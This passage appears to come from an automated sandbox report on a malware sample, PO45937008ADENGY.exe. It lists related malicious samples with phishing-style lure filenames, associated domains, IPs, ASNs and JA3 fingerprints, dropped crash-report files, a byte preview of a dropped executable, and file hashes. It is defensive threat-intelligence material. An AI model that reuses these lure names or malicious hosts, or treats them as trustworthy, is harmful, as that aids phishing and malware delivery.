                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-5183A347C7BAD04E3424599E1B978F29.html
                                                                                                ETL_126_072_60.docGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FC5277A9663FCE09586170F6A51B96A2.html
                                                                                                IMG_102-05_78_6.docGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-C6853B6BC65431464628FF23B3F0F335.html
                                                                                                ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
                                                                                                Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8CB85A57C5722245E360D575B497E6CC.html
                                                                                                kayo.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-867E80DBC8FFAEC73AC7FD4FE1DA1A1B.html
                                                                                                new_order20210408_14.docGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                                                                                new_order20210408_14.docGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A1DD2EDE961D10CC641FCFA5CF4FBAFC.html
                                                                                                DHLdocument11022020680908911.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-E073BCECB8DFC74A5738D8B1C32D8436.html
                                                                                                234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-8F0F96D3333F94679C552F5DEB9CE2AF.html
                                                                                                items list.docGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-2F0AA6F57E058337CC16810234C2DFDB.html
                                                                                                Krishna Gangaa Enviro System Pvt Ltd.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D1FD69143FEE625518220B28083FA2F9.html
                                                                                                SecuriteInfo.com.Artemis5C44BBDCCDFF.4370.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-09750D54320914EBBBA77235AE2BC46B.html
                                                                                                RFQ #46200058149.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FE6EFB3AED9F05224C930BEF8BE1CC20.html
                                                                                                Payment Slip E05060_47.docGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
                                                                                                New Orders.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-28D56F639751140E7A008217BE126C8D.html
                                                                                                DHL_document11022020680908911.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-531418C06045F41752298279414DE528.html
                                                                                                BL8846545545363.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B7B18D8B53846C51E3D2182818196100.html
                                                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                                                • myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-994F3BB06F4A7FE8F60B83F74A076F10.html

                                                                                                Domains

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.comLWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                BL01345678053567.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                New Order.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                SB210330034.pdf.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                YMvYmQQyCz4gkqA.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                executable.2772.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                onbgX3WswF.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                Swift001_jpg.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                Scan-45679.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                TT Remittance Copy.PDF.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                PO-108561.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                SWIFT COPY_pdf.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                emergency.vbsGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                yx8DBT3r5r.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                Po # 6-10331.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                4849708PO # RMS0001.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                                                                • 3.223.115.185
                                                                                                onstatic-pt.setupdns.netBL836477488575.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                nxHN51lQwj.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                EuDXqof7Tf.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                E4AaEjT91C.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                swift-copy-pdf.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                Inv_9876567.docGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                ORDER.xlsxGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                W2Gv3E8qiY.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                PRODUCT INQUIRY BNQ1.xlsxGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                new file.exe.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                R1Sc7jocaM.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                BOQ.exeGet hashmaliciousBrowse
                                                                                                • 81.88.57.70
                                                                                                www.szmsbk.comBL84995005038483.exeGet hashmaliciousBrowse
                                                                                                • 154.210.110.99

                                                                                                ASN

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                AS-26496-GO-DADDY-COM-LLCUSRFQ_AP65425652_032421 isu-isu,pdf.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                LWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                invoice.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PO4308.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                pumYguna1i.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                                • 107.180.43.16
                                                                                                7AJT9PNmGz.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PO7321.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PAYMENT ADVICE'.exeGet hashmaliciousBrowse
                                                                                                • 43.255.154.56
                                                                                                PO91361.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                56_012021.docGet hashmaliciousBrowse
                                                                                                • 198.71.233.47
                                                                                                SAKKAB QUOTATION_REQUEST.exeGet hashmaliciousBrowse
                                                                                                • 107.180.4.53
                                                                                                RFQ11_ZIM2021pdf.exeGet hashmaliciousBrowse
                                                                                                • 184.168.131.241
                                                                                                PEGTECHINCUSLWlcpDjYIQ.exeGet hashmaliciousBrowse
                                                                                                • 108.186.210.142
                                                                                                ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                                                • 108.186.210.142
                                                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                                • 104.233.169.166
                                                                                                TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                                                • 198.200.61.199
                                                                                                products order pdf.exeGet hashmaliciousBrowse
                                                                                                • 107.149.37.159
                                                                                                New _Items.Xlsx.Pdf.exeGet hashmaliciousBrowse
                                                                                                • 108.186.194.188
                                                                                                Doc.exeGet hashmaliciousBrowse
                                                                                                • 107.149.176.47
                                                                                                PAYMENT UPDATE.jpg.exeGet hashmaliciousBrowse
                                                                                                • 107.149.184.107
                                                                                                winlog.exeGet hashmaliciousBrowse
                                                                                                • 165.3.28.187
                                                                                                INVOICE CN No 1005911246.exeGet hashmaliciousBrowse
                                                                                                • 107.149.184.107
                                                                                                Payment_Advice_P&R_Shanghai_International Trading_citibank.exeGet hashmaliciousBrowse
                                                                                                • 165.3.13.232
                                                                                                nxHN51lQwj.exeGet hashmaliciousBrowse
                                                                                                • 107.149.205.85
                                                                                                EuDXqof7Tf.exeGet hashmaliciousBrowse
                                                                                                • 107.149.205.85
                                                                                                Sales Report.exeGet hashmaliciousBrowse
                                                                                                • 107.149.184.107
                                                                                                9j4sD6PmsW.exeGet hashmaliciousBrowse
                                                                                                • 104.233.238.207
                                                                                                RFQ 2-16-2021-.exeGet hashmaliciousBrowse
                                                                                                • 107.148.215.212
                                                                                                2089876578 87687.xlsxGet hashmaliciousBrowse
                                                                                                • 107.148.46.144
                                                                                                INV_TMB_C108976.xlsxGet hashmaliciousBrowse
                                                                                                • 107.148.46.144
                                                                                                aywqvkgnkxmwcGet hashmaliciousBrowse
                                                                                                • 107.148.210.230
                                                                                                0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                                                                • 198.200.62.230
                                                                                                VNPT-AS-VNVNPTCorpVN8QGglvUeYO.exeGet hashmaliciousBrowse
                                                                                                • 103.42.58.103
                                                                                                networkmanagerGet hashmaliciousBrowse
                                                                                                • 14.188.135.58
                                                                                                WUHU95Apq3Get hashmaliciousBrowse
                                                                                                • 113.183.33.163
                                                                                                G0ESHzsrvg.exeGet hashmaliciousBrowse
                                                                                                • 103.255.237.180
                                                                                                6OUYcd3GIs.exeGet hashmaliciousBrowse
                                                                                                • 103.255.237.180
                                                                                                http://singaedental.vn/wp-content/lQ/Get hashmaliciousBrowse
                                                                                                • 202.92.7.113
                                                                                                http://covisa.com.br/paypal-closed-y2hir/ABqY1RAPjaNGnFw9flbsTw3mbHnBB1OUWRV6kbbvfAryr4bmEsDoeNMECXf3fg6io/Get hashmaliciousBrowse
                                                                                                • 202.92.7.113
                                                                                                Adjunto_2021.docGet hashmaliciousBrowse
                                                                                                • 202.92.7.113
                                                                                                Dok 0501 012021 Q_93291.docGet hashmaliciousBrowse
                                                                                                • 202.92.7.113
                                                                                                11_extracted.exeGet hashmaliciousBrowse
                                                                                                • 103.207.39.131
                                                                                                https://correolimpio.telefonica.es/atp/url-check.php?URL=https%3A%2F%2Fnhabeland.vn%2Fsercurirys%2FRbvPk%2F&D=53616c7465645f5f824c0b393b6f3e2d3c9a50d9826547979a4ceae42fdf4a21ec36a319de1437ef72976b2e7ef710bdb842a205880238cf08cf04b46eccce50114dbc4447f1aa62068b81b9d426da6b&V=1Get hashmaliciousBrowse
                                                                                                • 103.255.237.61
                                                                                                SecuriteInfo.com.ArtemisC5924E341E9E.exeGet hashmaliciousBrowse
                                                                                                • 103.255.237.239
                                                                                                INFO 2020 DWP_947297.docGet hashmaliciousBrowse
                                                                                                • 14.177.232.31
                                                                                                MESSAGIO 83-46447904.docGet hashmaliciousBrowse
                                                                                                • 123.31.24.142
                                                                                                Order List and Quantities.pptGet hashmaliciousBrowse
                                                                                                • 103.207.39.131
                                                                                                Purchase list.pptGet hashmaliciousBrowse
                                                                                                • 103.207.39.131
                                                                                                2020141248757837844.pptGet hashmaliciousBrowse
                                                                                                • 103.207.39.131
                                                                                                PurchaseOrder#Q7677.pptGet hashmaliciousBrowse
                                                                                                • 103.207.39.131
                                                                                                Remittance Scan00201207.pptGet hashmaliciousBrowse
                                                                                                • 103.207.39.131
                                                                                                Sgyq1ebjMJ.rtfGet hashmaliciousBrowse
                                                                                                • 103.207.38.170

                                                                                                JA3 Fingerprints

                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                54328bd36c14bd82ddaa0c04b25ed9adConfirmed order#PR2100906.pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                ORDER-02188.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                qINcOlwRud.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                order-invoice-amazon-#D01-9237793-8041853.DOCX.vbsGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                nDHV6wKWHF.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                CWlXbVUJab.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                08042021New-PurchaseOrder.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                MT103_YIU LIAN08042021_Xerox Scan_202104_.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                lfQuSBwdSf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                RFQ-034.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                ACdEbpiSYO.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                PURCHASE ORDER - XIFFA55,pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                Invoice_ord00000009.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                kayo.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                RFQ 100400806 SUPPLY.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                new_order20210408_14.docGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                BL01345678053567.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                SER09090899.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                PURCHASE ORDER-34002174,pdf.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119
                                                                                                cricket.exeGet hashmaliciousBrowse
                                                                                                • 104.21.56.119

                                                                                                Dropped Files

                                                                                                No context

                                                                                                Created / dropped Files

                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_PO45937008ADENGY_548b4085ddbf64917cc844f65c389b6b83a46a9_884555ad_06e94ec9\Report.wer
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):17294
                                                                                                Entropy (8bit):3.767947348427798
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:HKV78LF+mHBUZMXyaKQqueZito/u7szS274Ithkf:UQLFPBUZMXyaFmX/u7szX4Itha
                                                                                                MD5:E1C76C8B43DC5BEE59EF7DB41A77E71C
                                                                                                SHA1:69C4E4EA4C5792AA9FBFC734F07A3F7D92224F4E
                                                                                                SHA-256:446B3BB058FF814A8E0448DD98080FF207F1F8BE128E218159B101EC075C72C4
                                                                                                SHA-512:5FEDA9FFFE17BBCD8D666A86CDF8525141B7A74109BAD278CB12E9857E1BCF4F0B1D190D0ADCFFDA08E50ABD377E22A07125BD6ABA274559BD2EDE6E9E810CB4
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.5.5.0.1.8.0.0.9.9.3.1.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.5.5.0.2.9.7.5.9.9.0.6.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.1.e.4.7.c.0.8.-.8.5.f.8.-.4.e.c.4.-.8.1.3.2.-.b.1.e.4.9.2.f.9.c.4.3.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.a.2.4.7.1.9.b.-.4.4.3.b.-.4.b.1.e.-.a.0.6.a.-.d.a.0.b.3.1.0.1.6.a.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.P.O.4.5.9.3.7.0.0.8.A.D.E.N.G.Y...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.7.0.-.0.0.0.1.-.0.0.1.b.-.8.0.6.9.-.3.e.8.5.6.a.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.a.9.0.9.7.0.3.5.9.d.a.1.6.d.f.b.c.f.8.9.6.4.8.f.7.a.3.8.
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER15F6.tmp.dmp
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:Mini DuMP crash report, 15 streams, Thu Apr 8 11:30:23 2021, 0x1205a4 type
                                                                                                Category:dropped
                                                                                                Size (bytes):329043
                                                                                                Entropy (8bit):3.5814895039261643
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:DoFNFT0j0Dxvljd+p7fORF07KYDnNH9gIOgF5cOun0t5eUCgUv7A0Cdg40U:DwNw01ip7AFk/H9RpDUcMTjjNm
                                                                                                MD5:C28730DB7F8DF42E74ADDA955E7931BA
                                                                                                SHA1:F1666C053F14566908BBF5819FE0D045C40C1B1A
                                                                                                SHA-256:E7118229511BB2A090078BCD88996CA660834521461170E76D96694CC7F184E5
                                                                                                SHA-512:195C6A3952DDAD44C2299A3F2AC27D1DECAB9AD0FB361FCD2239FFB92E78617846449D8C64948540CEBFA2B1787678BB6F46C3E7C4F0BA39C0024F3494814B3A
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: MDMP....... .......O.n`...................U...........B.......0......GenuineIntelW...........T.......p...<.n`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3111.tmp.WERInternalMetadata.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):8426
                                                                                                Entropy (8bit):3.700862223926201
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:Rrl7r3GLNi7y6R5E6YrlSU73MgmfZgS0n+prI89bzAsfbxm:RrlsNiO6s6YJSUAgmf6S0GzTfA
                                                                                                MD5:14C5D7D9ABD410AA9D5F4290CC86AA9B
                                                                                                SHA1:77E8181D0E5B328A19AC54DA632DDA06E5A8A4AB
                                                                                                SHA-256:5603FE1DCBE969C1D9B95DA2EB13C9267B04B3AB3DF764B306B321FC5AB8EAB6
                                                                                                SHA-512:FDABCEAE22E2DA11F4022A57F91167045256009132B22D423BDD78A88FAF5556B9D4BA57832ED8FA01889F22BB4BD711171B54512F4D5C6AE9ACDFE8BFA9B9BB
                                                                                                Malicious:false
                                                                                                Reputation:low
                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.2.4.<./.P.i.d.>.......
                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3400.tmp.xml
                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):4781
                                                                                                Entropy (8bit):4.503466224775152
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:cvIwSD8zsDUJgtWI9QidWSC8BiS8fm8M4Jw7oQFFDd+q8v2Qww5ERXbzXEdd:uITfDSesSNAHJw7oqdK2qERXPXEdd
                                                                                                MD5:B5612F197E49BE0F5539E39D980A3325
                                                                                                SHA1:C963DDFEAAD554375CC0552E3A6AE0DF7D4254AC
                                                                                                SHA-256:AC003F7CB91F18065FA391B83977D00D29315BF18E5C2655C51C79784C789CD8
                                                                                                SHA-512:3E2AFCD84558EE7327867D3B8E1669BF57B9D48BE16BF4A80539EE61C0C3EF4B5DA9B2AD2844E4F8C61E69DF80EC2CD450DE6FFC902EC967AFE7930D0B7FE4EF
                                                                                                Malicious:false
                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937241" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                C:\Users\user\IAHRsWbfqoM
                                                                                                Process:C:\Users\user\Desktop\PO45937008ADENGY.exe
                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                Category:dropped
                                                                                                Size (bytes):786426
                                                                                                Entropy (8bit):3.089624181395092
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:orDKSioZviCYjg+qGUFDA3l4bdIfWHmasNlTNr7WAei8rsOHBTL6LH78yqmkEqbv:oPysC8bi8
                                                                                                MD5:DF29A18D25AEB7C389776487B272C582
                                                                                                SHA1:EDC75070262B9F3E05B461CDCF0F09F3239006CF
                                                                                                SHA-256:1DDF2DC28689AAFA46287B55234B85977203E1F3F06AA2B370EA9E91C1B28B4B
                                                                                                SHA-512:51038E8C1A9D140275A27E5B192A716EABF50317DD8FFA979DEE7758210E24D99A67E03BE74825E9BDE4370123AD7372DD722C71996A4E823E3F237B4FFA408B
                                                                                                Malicious:false
                                                                                                Preview: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 76 142 41 180 0 0 0 0 0 0 0 0 224 0 34 0 11 1 80 0 0 122 3 0 0 6 0 0 0 0 0 0 142 152 3 0 0 32 0 0 0 160 3 0 0 0 0 128 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 0 0 0 0 0 0 0 0 224 3 0 0 2 0 0 0 0 0 0 2 0 64 133 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 64 152 3 0 75 0 0 0 0 160 3 0 212 3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 192 3 0 12 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 8 0 0 0 0 0 0 0 0 0 0 0 8 32 0 0 72 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 148 120 3 0 0 32 0 0 0 122 3 0 0 2 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 11

                                                                                                Static File Info

                                                                                                General

                                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                Entropy (8bit):4.784778244670397
                                                                                                TrID:
                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                File name:PO45937008ADENGY.exe
                                                                                                File size:112640
                                                                                                MD5:47ebf3893d8d6db4add1b87ad75495e4
                                                                                                SHA1:a90970359da16dfbcf89648f7a38fb75707181b3
                                                                                                SHA256:ee54b187c42f159bfba469c4b8c5ba0a85afeb802ea7eacaf400ccb38f7183af
                                                                                                SHA512:af3761d653503d2a4875297ff883d1e2a6114a8fbb77123929f1f7c4c1c974e7939d0382fdee8b01a80de5c0fa6edbe7c730ad17230d4f3fd100357c0166705c
                                                                                                SSDEEP:1536:yTlD/rTfbpANPKlHbP+x8sri5UE8QVeP2tALz/4PJNTLQJC4jPri+ZfUd37NWDeC:yTlD/rTfbpANPy50i/ayS
